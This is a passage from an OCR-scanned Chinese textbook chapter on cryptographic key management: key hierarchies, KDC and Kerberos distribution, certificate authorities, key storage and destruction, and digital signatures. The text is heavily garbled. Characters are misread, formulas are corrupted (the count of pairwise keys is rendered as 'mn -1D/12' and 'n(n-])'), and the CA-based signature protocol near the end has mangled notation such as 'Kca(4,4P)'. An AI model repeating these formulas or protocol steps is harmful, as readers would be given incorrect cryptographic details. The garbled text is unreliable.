被 预测 的 危险 ， 主 机 主 密 钥 是 控制 产生 其 他 加 密 密 钥 的 密 钥 ， 而 且 长 时 间 保 持 不 变 ， 因 此 
它 的 安全 性 是 至 关 重 要 的 。 
(2) 加 密 密 钥 的 产生 。 加 密 密 钥 可 以 由 机 器 自动 产生 ， 也 可 以 由 密 钥 操 作 员 选 定 。 加 
密 密 钥 构成 的 密 钥 表 存储 在 主机 中 的 辅助 存储 器 中 ， 只 有 密 钥 产生 器 才能 对 此 表 进 行 增 
加 、 修 改 、 删 除 和 更 换 密 钥 ， 其 副本 则 以 秘密 方式 送 给 相应 的 终端 或 主机 。 一 个 有 n 个 终 
端 用 户 的 通信 网 ， 若 要 求 任 一 对 用 户 之 间 彼 此 能 进行 保密 通信 ， 则 需要 mn -1D/12 个 密 钥 加 
密 密 钥 。 当 n 较 大 时 ， 难 免 有 一 个 或 数 个 被 敌手 掌握 。 因 此 密 钥 产生 算法 应 当 能 够 保证 其 
他 用 户 的 密 钥 加 密 密 钥 仍 有 足够 的 安全 性 。 可 用 随机 比特 产生 器 (如 噪声 二 极 管 振荡 器 等 ) 
或 伪 随 机 数 产 生 器 生成 这 类 密 钥 ， 也 可 用 主 密 钥 控制 下 的 某 种 算法 来 产生 。 
(3) 会 话 密 钥 的 产生 。 会 话 密 钥 可 在 密 钥 加 密 密 钥 作用 下 通过 某 种 加 密 算法 动态 地 产 
生 ， 如 用 初始 密 钥 控 制 一 非 线 性 移 位 寄存 器 或 用 密 钥 加 密 密 钥 控制 DES 算法 产生 。 初 始 密 
钥 可 用 产生 密 钥 加 密 密 钥 或 主机 主 密 钥 的 方法 生成 。 


2.2.4” 密 钥 的 组 织 结构 


一 个 密 钥 系统 可 能 有 若干 种 不 同 的 组 成 部 分 ， 按 照 它们 之 间 的 控制 关系 ， 可 以 将 各 个 部 
分 划分 为 一 级 密 钥 、 二 级 密 铀 、…… 、 级 密 钥 ， 组 成 一 个 n 级 密 钥 系统 ， 如 图 2.5 所 示 。 


Ki 密 钥 协 议 1 Ki 
天 2 密 钥 协议 2 天 2 
Km-l 密 钥 协议 -1 Km-l 
Kn : Ve 
密 文 : 明文 


2.5 ”多 层 密 钥 系统 机 构 示意 图 


其 中 ， 一 级 密 钥 用 算法 太保 护 二 级 密 钥 ， 二 级 密 钥 用 算法 万 保 护 三 级 密 钥 ， 依 此 类 
推 ， 直 到 最 后 的 ?级 密 钥 用 算法 太保 护 明 文 数据 。 随 着 加 密 过 程 的 进行 ， 各 层 密 钥 的 内 容 动 
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态 变化 ， 而 这 种 变化 的 规则 由 相应 层次 的 密 钥 协议 控制 。 其 中 每 一 层 密 钥 又 可 以 划分 为 若干 
种 不 同 功能 的 成 分 ， 有 的 成 分 必须 以 密 文 的 方式 存在 ， 有 的 则 允许 以 明文 的 方式 存在 。 

以 上 结构 的 基本 思想 就 是 使 用 密 钥 来 保护 密 钥 。f 层 用 密 钥 右 保 护 ，f+1 层 用 密 钥 
+1 保护， 同时 它 本 身 还 受到 f 一 1 层 密 钥 KK 一 1 的 保护 。 

最 底层 的 密 钥 KK, 也 叫 作 工 作 密 铀 ， 用 于 直接 加 、 解 密 数 据 ， 而 所 有 上 层 的 密 钥 均 叫 
作 密 钥 加 密 密 钥 。 为 保证 密 钥 的 安全 ， 一 般 情况 下 工作 密 钥 平 时 并 不 放 在 加 密 装 置 里 保 
存 ， 而 是 在 需要 进行 加 、 解 密 时 由 上 层 的 密 钥 临 时 产生 ， 使 用 完毕 就 立即 清除 。 
最 高 层 的 密 钥 KK 也 叫 作 主 密 钥 。 一 般 来 说 ， 主 密 钥 是 整个 密 钥 管 理 系 统 中 最 核心 、 最 
重要 的 部 分 ， 应 采用 最 保险 的 手段 严格 保护 。 

多 层 密 钥 体 制 的 优点 如 下 。 

(1) 安全 性 大 大 提高 ， 主 要 体现 在 即使 下 层 的 密 钥 被 破译 也 不 会 影响 到 上 层 密 钥 的 


安全 。 
(2) 为 密 钥 管理 自动 化 带 来 了 方便 。 


2.2.5 ” 密 钥 分 发 


密 钥 管理 需 解决 的 另 一 个 基本 问题 是 密 钥 的 定期 更 换 问 题 。 任 何 密 钥 都 应 有 规定 的 使 
用 期 限 ， 制 订 使 用 期 限 的 依据 不 是 取决 于 在 这 段 时 间 内 密码 能 否 被 破译 ， 而 是 从 概率 的 意 
义 上 看 密 钥 机 密 是 否 有 可 能 被 泄露 出 去 。 从 密码 技术 的 现状 来 看 ， 现 在 完全 可 以 做 到 使 加 
密 设备 里 的 密 钥 几 年 内 不 更 换 ， 甚 至 在 整个 加 密 设备 的 有 效 期 内 保持 不 变 。 但 是 ， 加 密 设 
备 里 的 密 钥 在 使 用 多 长 时 间 后 就 有 可 能 被 窃取 或 被 泄露 ， 这 个 问题 超出 了 数学 的 能 力 之 
外 。 比 如 一 个 花 了 100 万 美元 也 难以 破译 的 密码 系统 也 可 能 只 需 1 万 美元 就 能 买通 密 钥 管 
理 人 员 。 

显然 ， 密 钥 应 当 尽 可 能 地 经 常 更 换 ， 更 换 密 钥 时 应 尽量 减少 人 工 干预 ， 必 要 时 一 些 核 
心 密 钥 对 操作 人 员 也 要 保密 ， 这 就 涉及 密 钥 分 发 技术 问题 。 

密 钥 分 发 技术 中 最 成 熟 的 方案 是 采用 密 钥 分 发 中 心 (Key Distribution Center，KDC)， 
这 是 当今 密 钥 管理 的 一 个 主流 。 其 基本 思想 如 下 。 

(1) 每 个 节点 或 用 户 只 需 保管 与 KDC 之 间 使 用 的 密 钥 加 密 密 钥 ， 这 样 的 密 钥 配 置 实现 
了 以 KDC 为 中 心 的 星 形 通信 网 。 

(2) 当 两 个 用 户 需要 相互 通信 时 ， 只 需 向 密 钥 分 发 中 心 申请 ， 密 钥 分 发 中 心 就 把 加 密 
过 的 工作 密 钥 分 别 发 送 给 主 叫 用 户 和 被 叫 用 户 ， 这 样 对 于 每 个 用 户 来 说 就 不 需要 保存 大 量 的 
密 钥 了 ， 而 且 真正 用 于 加 密 明 文 的 工作 密 钥 是 一 报 一 换 的 ， 可 以 做 到 随 用 随 申 请 随 清除 。 

(3) 为 保证 KDC 的 工作 正常 ， 还 应 考虑 非法 的 第 三 者 不 能 插入 伪造 的 服务 而 取代 
KDC， 这 种 验证 身份 的 工作 也 是 KDC 的 工作 。 


1. 对 称 密 钥 的 分 发 


对 称 密码 体制 的 主要 特点 是 加 、 解 密 双 方 在 加 、 解 密 过 程 中 要 使 用 完全 相同 的 一 个 密 
钥 。 对 称 密 钥 密 码 体制 存在 的 最 主要 问题 是 ， 由 于 加 、 解 密 双 方 都 要 使 用 相同 的 密 钥 ， 因 
此 在 发 送 、 接 收 数据 之 前 必须 完成 密 钥 的 分 发 。 所 以 ， 密 钥 的 分 发 便 成 了 该 加 密 体 系 中 的 
最 薄弱 、 也 是 风险 最 大 的 环节 。 
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由 于 公 钥 加 密 的 安全 性 高 ， 所 以 对 称 密 钥 密码 体制 多 采用 公 钥 加 密 的 方法 。 发 送 方 
接收 方 的 公 钥 将 要 传递 的 密 钥 加 密 ， 接 收 方 用 自己 的 私 钥 解 密 传递 过 来 的 密 钥 ， 而 其 他 人 
由 于 没有 接收 方 的 私 钥 ， 所 以 不 可 能 得 到 传递 的 密 钥 ， 这 样 对 称 密 钥 密码 体制 的 密 钥 在 传 
递 过 程 中 被 破解 的 可 能 性 大 大 降低 。 用 一 个 实例 来 说 明 对 称 密 钥 密 码 体制 的 密 钥 分 发 存在 
的 问题 。 例 如 ， 设 有 7 方 参与 通信 ， 若 n 方 都 采用 同一 个 对 称 密 钥 ， 这 样 密 钥 管 理 和 传递 
容易 ， 可 是 一 旦 密 钥 被 破解 ， 整 个 体系 就 会 崩溃 。 若 采用 不 同 的 对 称 密 钥 则 需 n(n-]) 个 密 
钥 ， 密 钥 数 与 参与 通信 人 数 的 平方 数 成 正比 ， 假 设 在 某 机 构 中 有 100 个 人 ， 如 果 任 何 两 个 
人 之 间 要 用 不 同 的 密 铀 ， 则 总 共 需 要 4950 个 密 钥 ， 而 且 每 个 人 应 记 住 99 个 密 钥 。 如 果 机 
构 的 人 数 是 1000 人 、10000 人 或 更 多 ， 管 理 密 钥 将 非常 复杂 。 

为 能 在 Interet 上 提供 一 个 实用 的 解决 方案 ，Kerberos 建立 了 一 个 安全 的 、 可 信任 的 
密 钥 分 发 中 心 (KDC)， 每 个 用 户 只 要 知道 一 个 和 KDC 进行 会 话 的 密 钥 就 可 以 了 ， 而 不 需要 
知道 成 百 上 千 个 不 同 的 密 钥 。 

假设 用 户 甲 想 要 和 用 户 乙 进行 秘密 通信 ， 则 甲 先 和 KDC 通信 ， 用 只 有 用 户 甲 和 KDC 
知道 的 密 钥 进行 加 密 ， 用 户 甲 告诉 KDC 他 想 和 用 户 乙 进行 通信 ，KDC 会 为 用 户 甲 和 用 户 
乙 之 间 的 会 话 随机 选择 一 个 对 话 密 钥 ， 并 生成 一 个 标签 ， 这 个 标签 用 KDC 和 用 户 乙 之 间 
的 密 钥 进行 加 密 ， 并 在 用 户 甲 启动 和 用 户 乙 对 话 时 ， 把 这 个 标签 交 给 用 户 乙 。 这 个 标签 的 
作用 是 让 用 户 甲 确信 和 他 交谈 的 是 用 户 乙 ， 而 不 是 冒充 者 。 因 为 这 个 标签 是 由 只 有 用 户 乙 
和 KDC 知道 的 密 钥 进行 加 密 的 ， 所 以 即使 冒充 者 得 到 用 户 甲 发 出 的 标签 也 不 可 能 进行 解 
密 ， 只 有 用 户 乙 收 到 后 才能 够 进行 解密 ， 从 而 确定 了 与 用 户 甲 对 话 的 人 就 是 用 户 乙 。 

当 KDC 生成 标签 和 随机 会 话 密码 后 ， 就 会 把 它们 用 只 有 用 户 甲 和 KDC 知道 的 密 钥 进 
行 加 密 ， 然 后 把 标签 和 会 话 密 钥 传 给 用 户 甲 ， 加 密 的 结果 可 以 确保 只 有 用 户 甲 能 得 到 这 个 
信息 ， 只 有 用 户 甲 能 利用 这 个 会 话 密 钥 和 用 户 乙 进行 通话 。 同 理 ，KDC 会 把 会 话 密码 用 只 
有 KDC 和 用 户 乙 知道 的 密 钥 加 密 ， 并 把 会 话 密 钥 给 用 户 乙 ， 如 图 2.6 所 示 。 


甲 和 KDC 共享 的 秘 

密 密 角 
甲 和 KDC 共享 的 秘 
密 密 角 


图 2.6 对 称 密 钥 的 分 发 

用 户 甲 会 启动 一 个 和 用 户 乙 的 会 话 ， 并 用 得 到 的 会 话 密 钥 加 密 自 己 和 用 户 乙 的 会 话 ， 
还 要 把 KDC 传 给 它 的 标签 传 给 用 户 乙 以 确定 用 户 乙 的 身份 ， 然 后 用 户 甲 和 用 户 乙 之 间 就 
可 以 用 会 话 密 钥 进行 安全 会 话 了 ， 为 了 保证 安全 ， 这 个 会 话 密 钥 是 一 次 性 的 ， 这 样 黑客 就 
更 难 进行 破解 了 。 同 时 由 于 密 钥 是 一 次 性 由 系统 自动 产生 的 ， 则 用 户 不 必 记 那么 多 密 钥 
了 ， 方便 了 人 们 的 通信 。 

2. 公 钥 的 分 发 

非 对 称 密 钥 密码 体制 ， 即 公开 密 钥 密码 体制 能 够 验证 信息 发 送 人 与 接收 人 的 真实 身 
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份 ， 对 所 发 出 /接收 信息 在 事后 具有 不 可 抵赖 性 ， 能 够 保障 数据 的 完整 性 。 这 里 有 一 个 前 提 
就 是 要 保证 公 钥 和 公 钥 持 有 人 之 间 的 对 应 关系 。 因 为 任何 人 都 可 以 通过 多 种 不 同 的 方式 公 
布 自 己 的 公 铜 ， 如 个 人 主页 、 电 子 邮 件 和 其 他 一 些 公用 服务 器 等 ， 由 于 其 他 人 无 法 确认 它 
所 公布 的 公 钥 是 否 就 是 他 自己 的 ， 所 以 也 就 无 法 认可 他 的 数字 签名 。 

如 果 得 到 了 一 个 虚假 的 公 铀 ， 比 如 说 想 传 给 A 一 个 文件 ， 于 是 开始 查找 A 的 公 钥 ， 
但 是 这 时 B 从 中 捣乱 ， 他 用 自己 的 公 钥 替换 了 A 的 公 钥 ,让 A 错误 地 认为 B 的 公 钥 就 是 
A 的 公 钥 ， 导 致 最终 使 用 B 的 公 钥 加 密 文件 ， 结 果 A 无 法 打开 文件 ， 而 B 可 以 打开 文 
件 ， 这 样 B 实现 了 对 保密 信息 的 窃取 行为 。 因 此 就 算是 采用 非 对 称 密码 技术 ， 仍 旧 无 法 完 
全 保证 保密 性 ， 那 么 如 何 才能 准确 地 得 到 别人 的 公 钥 呢 ? 这 时 就 需要 一 个 仲裁 机 构 ， 或 者 
说 是 一 个 权威 的 机 构 ， 它 能 准确 无 误 地 提供 他 人 的 公 钥 ， 这 就 是 CA(Certification 
Authority)。 

这 实际 上 也 是 应 用 公 钥 技术 的 关键 ， 即 如 何 确认 某 个 人 真正 拥有 公 钥 (及 对 应 的 私 
钥 )。 为 确保 用 户 的 身份 及 其 所 持 有 密 钥 的 正确 匹配 ， 公 开 密 钥 系 统 需要 一 个 值得 信赖 而 且 
独立 的 第 三 方 机 构 充 当 认 证 中 心 ， 来 确认 公 钥 拥有 人 的 真正 身份 。 认 证 中 心 发 放 一 个 称 为 
“ 公 钥 证 书 ”的 身份 证 明 ， 公 钥 证 书 通常 简称 为 证 书 ， 是 一 种 数字 签名 的 声明 ， 它 将 公 钥 
的 值 绑 定 到 持 有 对 应 私 钥 的 个 人 、 设 备 或 服务 的 标识 上 。 像 公安 局 对 身份 证 盖 章 一 样 ， 认 
证 中 心 利用 本 身 的 私 钥 为 数字 证 书 加 上 数字 签名 ， 任 何 想 发 放 自己 公 钥 的 用 户 ， 可 以 去 认 
证 中 心 申请 自己 的 证 书 。 认 证 中 心 在 核实 真实 身份 后 ， 颁 发 包含 用 户 公 钥 的 数字 证 书 。 其 
他 用 户 只 要 能 验证 证 书 是 真实 的 ， 并 且 信 任 颁发 证 书 的 认证 中 心 ， 就 可 以 确认 用 户 的 公 
钥 。 有 了 大 家 信任 的 认证 中 心 ， 用 户 才 能 放心 、 方 便 地 使 用 公 钥 技术 带 来 的 安全 服务 。 


2.2.6 ” 密 钥 的 保护 


密 钥 保护 技术 涉及 密 钥 的 传送 、 注 入 、 存 储 、 使 用 、 更 换 、 销 毁 等 多 个 方面 ， 以 下 简 
要 讨论 密 钥 保护 中 的 几 个 基本 问题 。 

1. 密 钥 的 注入 

加 密 设备 里 的 最 高 层 密 钥 ( 主 密 钥 或 一 级 密 钥 ) 通 常 都 需要 以 人 工 的 方式 装 入 。 把 密 铀 
装 入 到 加 密 设备 经 常 采用 的 方式 有 键盘 输入 、 软 盘 输入 、 专 用 的 密 钥 注入 设备 ( 即 密 钥 枪 ) 
输入 等 。 密 钥 除 了 正在 进行 加 密 操作 的 情况 以 外 ， 应 当 一 律 以 加 密 保护 的 形式 存放 。 密 钥 
的 注入 过 程 应 有 一 个 封闭 的 工作 环境 ， 所 有 接近 密 钥 注入 工作 的 人 员 应 当 是 绝对 安全 的 ， 
不 存在 可 被 窍 听 装 置 接收 的 电磁 或 其 他 辐射 。 

采用 密 钥 枪 或 密 钥 软盘 应 与 键盘 输入 的 口令 相 结合 ， 只 有 在 输入 了 合法 的 加 密 操作 
令 后 才能 激活 密 钥 枪 或 软盘 里 的 密 钥 信息 ， 应 建立 一 定 的 接口 规范 。 

在 密 钥 注 入 过 程 完成 后 ， 不 允许 存在 任何 可 能 导出 密 钥 的 残留 信息 ， 比 如 应 将 内 存 中 
使 用 过 的 存储 区 清 零 。 当 使 用 密 钥 注入 设备 用 于 远 距离 传递 密 钥 时 ， 注 入 设备 本 身 应 设计 
成 封闭 式 的 物理 、 逻 辑 单元 。 

2. 密 钥 的 存储 

在 密 钥 注入 以 后 ， 所 有 存储 在 加 密 设备 里 的 密 钥 都 应 以 加 密 的 形式 存放 ， 而 对 这 些 密 
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钥 解 密 的 操作 口令 应 该 由 密码 操作 人 员 人 掌握。 这样 即使 装 有 密 钥 的 加 密 设 备 被 破译 者 拿 到 
也 可 以 保证 密 钥 系统 的 安全 。 

(D 加 密 设备 应 有 一 定 的 物理 保护 措施 。 最 重要 的 密 钥 信息 应 采用 掉 电 保护 措施 ， 使 
得 在 任何 情况 下 只 要 一 拆 开 加 密 设备 ， 这 部 分 密 钥 就 自动 丢失 。 

(2) 如 果 采 用 软件 加 密 的 形式 ， 应 有 一 定 的 软件 保护 措施 。 

(3) 重要 的 加 密 设 备 应 有 紧急 情况 下 清除 密 钥 的 设计 。 

(4) 在 可 能 的 情况 下 ， 应 有 对 加 密 设备 进行 非法 使 用 的 审计 设计 ， 把 非法 口令 输入 等 
事件 的 产生 时 间 等 记录 下 来 。 

(5) 高 级 的 专用 加 密 装置 应 做 到 无 论 通过 直观 的 、 电 子 的 或 其 他 方法 (X 射线 、 电 子 显 
微 镜 ) 都 不 可 能 从 密码 设备 中 读 出 信息 。 

(6) 对 当前 使 用 的 密 钥 应 有 密 钥 的 合法 性 验证 措施 ， 以 防止 被 算 改 。 

3. 密 钥 的 有 效 期 

密 钥 不 能 无 限期 地 使 用 ， 密 钥 的 使 用 时 间 越 长 ， 泄 露 的 机 会 就 越 大 。 不 同 的 密 钥 应 有 
不 同 的 有 效 期 ， 如 电话 就 是 把 通话 时 间作 为 密 钥 有 效 期 ， 当 再 次 通话 时 就 启动 新 的 密 钥 。 
密 钥 加 密 密 钥 无 需 频繁 更 换 ， 因 为 它们 只 是 偶尔 进行 密 钥 交 换 。 而 用 来 加 密 保存 数据 文件 
的 加 密 密 钥 不 能 经 常 更 换 ， 因 为 文件 可 以 加 密 储藏 在 磁盘 上 数 月 或 数 年 。 公 开 密 钥 应 用 中 
私人 密 钥 的 有 效 期 是 根据 应 用 的 不 同 而 变化 ， 用 于 数字 签名 和 身份 识别 的 私人 密 钥 必须 持 
续 数 年 甚至 终身 。 

4. 密 钥 的 更 换 

一 旦 密 钥 有 效 期 到 ， 必 须 清除 原 密 钥 存储 区 ， 或 者 用 随机 产生 的 噪声 重 写 。 但 为 了 保 
证 加 密 设备 能 连续 工作 ， 也 可 以 设计 成 新 密 钥 生效 后 ， 旧 密码 还 继续 保持 一 段 时 间 ， 以 防 
止 在 更 换 密 钥 期 间 不 能 解密 。 

密 钥 更 换 可 以 采用 批 密 钥 的 方式 ， 即 一 次 性 注入 多 个 密 钥 ， 在 更 换 密 钥 时 可 按照 一 个 
密 钥 生 效 ， 另 一 个 密 钥 废除 的 形式 进行 ， 蔡 代 的 次 序 可 采用 密 钥 的 序号 。 如 果 批 密 钥 的 生 
效 与 废除 是 顺序 的 话 ， 那 么 序数 低 于 正在 使 用 的 密 钥 的 所 有 密 钥 都 已 过 期 ， 相 应 的 存储 区 
应 清 零 。 当 为 了 跳 过 一 个 密 钥 而 使 用 强制 的 密 钥 更 换 ， 由 于 被 跳 过 的 密 钥 不 再 使 用 ， 也 应 
进行 清 零 。 

5. 密 钥 的 销毁 

在 密 钥 定期 更 换 之 后 ， 旧 密 钥 就 必须 销毁 。 旧 密 钥 是 有 价值 的 ， 即 使 不 再 使 用 ， 有 了 
它们 ， 攻 击 者 就 能 读 到 由 它 加 密 的 一 些 旧 消息 。 要 安全 地 销毁 存储 在 磁盘 上 的 密 钥 ， 应 多 
次 对 磁盘 存储 的 实际 位 置 进行 写 履 盖 或 将 磁盘 切 碎 ， 用 一 个 特殊 的 删除 程序 查看 所 有 磁 
盘 ， 寻 找 在 未 用 存储 区 上 的 密 钥 副本 ， 并 将 它们 删除 。 


2.3 ”数字 签名 与 数字 证 书 


在 传统 商务 活动 中 ， 为 保证 交易 的 安全 与 真实 ， 一 份 书面 合同 或 公文 要 由 当事人 或 其 
负责 人 签字 、 盖 章 ， 以 便 让 交易 双方 识别 是 谁 签 的 合同 ， 保 证 签字 或 盖 章 的 人 认可 合同 的 
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内 容 ， 在 法 律 上 才能 承认 这 份 合同 的 有 效 性 。 而 在 电子 商务 的 虚拟 世界 中 ， 合 同 或 文件 是 
以 电子 文件 的 形式 表现 和 传递 的 ， 在 电子 文件 上 ， 传 统 的 手写 签名 和 盖 章 是 无 法 进行 的 ， 
这 就 必须 依靠 技术 手段 来 蔡 代 。 


2.3.1 电子 签名 


电子 签名 不 是 书面 签名 的 数字 化 ， 而 是 现代 认证 技术 的 泛称 ， 美 国 《 统 一 电子 交易 
法 》 规 定 ，“ 电 子 签名 ” 泛 指 “与 电子 记录 相 联 的 或 在 逻辑 上 相 联 的 电子 声音 、 符 号 或 程 
序 ， 而 该 电子 声音 、 符 号 或 程序 是 某 人 为 签署 电子 记录 的 目的 而 签订 或 采用 的 ”。 从 上 述 
定义 来 看 ， 凡 是 能 在 电子 商务 中 起 到 证 明 当 事 人 的 身份 、 证 明 当 事 人 对 文件 内 容 认 可 的 电 
子 技术 手段 ， 都 可 称 为 电子 签名 ， 它 是 电子 商务 安全 的 重要 保障 手段 。 

目前 ， 可 以 通过 多 种 技术 手段 实现 电子 签名 ， 在 确认 了 签署 者 的 确切 身份 后 ， 人 们 可 
以 用 多 种 不 同 的 方法 签署 一 份 电子 记录 ， 方 法 有 手写 签名 或 图 章 的 模式 识别 、 以 生物 特征 
统计 学 为 基础 的 识别 标识 以 及 一 个 让 收 件 人 能 识别 发 件 人 身份 的 密码 代号 、 密 码 或 个 人 识 
别 码 ， 基 于 PKI(Public Key Infrastructure， 公 钥 基 础 设施 ) 的 公 钥 密码 技术 的 数字 签名 等 。 


1. 手写 签名 或 图 章 的 模式 识别 


将 手写 签名 或 印章 作为 图 像 ， 扫 描 转 换 后 在 数据 库 中 加 以 存储 ， 当 对 此 人 进行 验证 
时 ， 扫 描 输入 并 将 原 数 据 库 中 对 应 图 像 调 出 ， 用 模式 识别 的 数学 计算 方法 进行 比 对 ， 以 确 
认 该 签名 或 印章 的 真 伪 。 这 种 方法 由 于 需要 大 容量 数据 库存 储 以 及 每 次 手写 签名 和 盖 印 都 
有 差异 ， 因 此 不 适用 于 在 Internet 上 传输 。 

2. 生物 识别 技术 

生物 识别 技术 是 利用 人 体 生物 特征 进行 身份 认证 的 一 种 技术 ， 生 物 特征 是 一 个 人 与 他 
人 不 同 的 唯一 表征 ， 它 是 可 以 测量 、 自 动 识别 和 验证 的 。 生 物 识别 系统 对 生物 特征 进行 取 
样 ， 提 取 其 唯一 的 特征 进行 数字 化 处 理 ， 转 换 成 数字 代码 ， 并 进一步 将 这 些 代码 组 成 特征 
模板 存 于 数据 库 中 。 人 们 同 识别 系统 交互 进行 身份 认证 时 ， 识 别 系统 获取 其 特征 并 与 数据 
库 中 的 特征 模板 进行 比 对 ， 以 确定 是 否 匹配 ， 从 而 确认 或 否认 此 人 。 以 上 身份 识别 方法 适 
用 于 面对面 场合 ， 不 适用 远程 网 络 认 证 及 大 规模 人 群 认证 。 

3. 密码 、 密 码 代 号 或 个 人 识别 码 

传统 的 对 称 密 钥 加 、 解 密 的 身份 识别 和 签名 方法 。 甲 方 需要 乙方 签署 一 份 电子 文件 ， 
甲 方 可 产生 一 个 随机 码 传送 给 乙方 ， 乙 方 用 双方 事先 约定 好 的 对 称 密 钥 加 密 该 随机 码 和 电 
子 文件 回 送 给 甲 方 ， 甲 方 用 同样 对 称 密 钥 解密 后 得 到 电文 并 核对 随机 码 ， 如 随机 码 核对 正 
确 ， 甲 方 即 可 认为 该 电文 来 自 乙方 。 它 适用 于 远程 网 络 传输 ， 但 对 称 密 钥 管理 困难 ， 不 适 
合 大 规模 人 群 认 证 。 
实现 电子 签名 的 技术 手段 有 很 多 种 ， 但 目前 比较 成 熟 的 、 使 用 方便 且 具 有 可 操作 性 
为、 在 世界 先进 国家 和 我 国 普遍 使 用 的 电子 签名 技术 ， 还 是 基于 PKI 的 数字 签名 技术 。 
于 保持 技术 中 立 性 是 制定 法 律 的 一 个 基本 原则 ， 目 前 还 没有 任何 理由 说 明 公 钥 密 码 理论 是 
电子 签名 的 唯一 技术 ， 因 此 有 必要 规定 一 个 更 一 般 化 的 概念 以 适应 今后 技术 的 发 展 。 
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在 对 称 密 钥 加 、 解 密 认 证 中 ， 在 实际 应 用 方面 经 常 采用 的 是 ID+PIN( 身 份 唯 一 标识 + 口 
令 )， 即 发 送 方 用 对 称 密 钥 加 密 ID 和 PIN 发 给 接收 方 ， 接 收 方 解 密 后 与 后 台 存 放 的 ID 和 
令 进 行 比 对 ， 达 到 认证 的 目的 。 人 们 在 日 常生 活 中 使 用 的 银行 卡 就 是 用 的 这 种 认证 方 
法 。 它 适用 于 远程 网 络 传输 ， 对 称 密 钥 管理 困难 ， 不 适用 于 电子 签名 。 


2.3.2 ”认证 机 构 CA 


认证 机 构 是 PKI 的 核心 执行 机 构 ， 是 PKI 的 主要 组 成 部 分 ， 一 般 简称 为 CA， 在 业界 
通常 把 它 称 为 认证 中 心 ， 它 是 具有 权威 性 、 可 信任 性 和 公正 性 的 第 三 方 机 构 。 认 证 机 构 
CA 的 建设 要 根据 国家 市 场 准 入 政策 由 国家 主管 部 门 批准 ， 具 有 权威 性 ，CA 机 构 本 身 的 建 
设 应 有 具备 条 件 ， 采 用 的 密码 算法 及 技术 保障 是 高 度 安全 的 ， 具 有 可 信任 性 ;CA 是 不 参与 
交易 双方 利益 的 第 三 方 机 构 ， 具 有 公正 性 。CA 认证 机 构 在 《电子 签名 法 》 中 被 称 为 “ 电 
子 认证 服务 提供 者 ”。 

CA 的 组 成 主要 有 证 书签 发 服务 器 ， 负 责 证 书 的 签发 和 管理 ， 包 括 证 书 归 档 、 撤 销 和 
更 新 等 ， 密 钥 管 理 中 心 ， 用 硬件 加 密 机 产生 公 / 私 密 钥 对 ， 提 供 CA 证 书 的 签发 ， 目 录 服 务 
器 负责 证 书 和 证 书 撤销 列表 (CRL) 的 发 布 和 查询 。 

CA 的 组 成 如 图 2.7 所 示 。 它 是 一 个 层次 结构 ， 第 一 级 是 根 CA(Root CA)， 负 责 总 政 
策 ; 第 二 级 是 政策 CA(PCA)， 负 责 制 订 具 体 认证 策略 ;第 三 级 为 操作 CA(OCA)， 是 证 书 
签发 、 发 布 和 管理 的 机 构 。 

RA(Registration Authority) 是 认证 中 心 的 组 成 部 分 ， 是 数字 证 书 的 申请 、 注 册 、 审 批 、 
校对 和 管理 机 构 。 证 书 申请 、 注 册 机 构 RA 也 称 为 层次 结构 ，RA 为 注册 总 中 心 ， 负 责 证 
书 申请 、 注 册 汇 总 ，LRA 为 远程 本 地 受理 点 ， 负 责 用 户 证 书 申请 和 审查 ， 只 有 那些 经 过 身 
份 信用 审查 合格 的 用 户 才 可 以 接受 证 书 的 申请 ， 批 准 向 其 签发 证 书 ， 这 是 保障 证 书 使 用 的 
安全 基础 。 


根 CA( Root CA) 


政策 CA(PCA) 


图 2.7 CA 结构 框图 


运营 CA(OCA) 


2.3.3 ”数字 签名 


数字 签名 在 ISO7498-2 标准 中 定义 为 : “附加 在 数据 单元 上 的 一 些 数据 ， 或 是 对 数据 
单元 所 做 的 密码 变换 ， 这 种 数据 和 变换 允许 数据 单元 的 接收 者 用 以 确认 数据 单元 来 源 和 数 
据 单元 的 完整 性 ， 并 保护 数据 ， 防 止 被 人 (如 接收 者 ) 进 行 伪造 ”。 美 国电 子 签名 标准 
(DSS，FIPS186-2) 对 数字 签名 作 了 以 下 解释 : “利用 一 套 规则 和 一 个 参数 对 数据 计算 所 得 
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的 结果 ， 用 此 结果 能 够 确认 签名 者 的 身份 和 数据 的 完整 性 ”。 数 字 签名 必须 保证 以 下 三 点 。 
(1) 接收 者 能 够 核实 发 送 者 对 报 文 的 签名 。 
(2) 发 送 者 事后 不 能 抵赖 对 报 文 的 签名 。 
(3) 接收 者 不 能 伪造 对 报 文 的 签名 。 
可 以 有 多 种 方法 来 实现 数字 签名 ， 以 下 介绍 其 中 的 几 种 。 


1. 使 用 


秘密 密 钥 算法 的 数字 签名 


这 种 方式 需要 CA 的 参与 ， 每 个 用 户 事 先 选 择 好 一 个 与 CA 共享 的 密 钥 并 亲手 交 到 CA 
办 公 室 ， 以 保证 只 有 用 户 和 CA 知道 这 个 密 钥 。 此 外 ，CA 还 有 一 个 对 所 有 用 户 都 保密 的 
密 钥 KecA， 如 图 2.8 所 示 。 


由 


pe 90 9 


Rd Wi Dy Koi B,D) 


2.8 使 用 CA 进行 数字 签名 


用 户 4 想 向 用 户 B 发 送 一 个 签名 的 报 文 已 时 ， 它 向 CA 发 出 K4(B,R4bP)， 其 中 Ra 


为 报 文 的 随机 编号 ，t 为 时 间 惟 ; CA 将 其 解密 后 重新 组 织 成 一 个 新 的 密 文 
Ka(4,R4,t,P,Kca(4,4,P)) 发 给 B， 因 为 只 有 CA 知道 密 钥 KeA， 因 此 其 他 任何 人 都 无 法 产生 和 
解 开 密 文 Kca(4，t，P); B 用 密 钥 Ks 解 开 密 文 后 ， 首 先 将 Kca(4,1.P) 放 在 一 个 安全 的 地 
方 ， 然 后 阅读 和 执行 P。 当 过 后 4 试图 否认 给 B 发 过 报 文 P 时 ，B 可 以 出 示 Kca(4,4P) 来 
证 明 4 确实 发 过 P， 因 为 B 自己 无 法 伪造 出 Kca(4,t.P)， 它 是 由 CA 发 来 的 ， 而 CA 是 可 以 
信赖 的 ， 如 果 4 曾 给 CA 发 过 P，CA 就 不 会 将 发 给 ， 这 只 要 用 密 钥 Kc 对 Kca(4,4P) 


进行 解密 ， 一 切 就 可 真相 大 白 。 


为 避免 本 


EE 复 攻击 ， 协 议 中 使 用 了 随机 报 文 编号 Rs 和 时 间 戳 # 她 能 记 住 最 近 收 到 的 所 有 报 


文 编号 ， 如 果 和 其 中 的 某 个 编号 相同 ， 则 P 就 被 当成 一 个 复制 品 而 丢弃 ， 男 外 B 也 根据 时 间 


戳 上 丢弃 一 些 非常 老 的 报 文 ， 以 防止 攻击 者 经 过 很 长 一 段 时 间 后 再 用 老 报 文 来 重复 攻击 。 


2. 使 用 


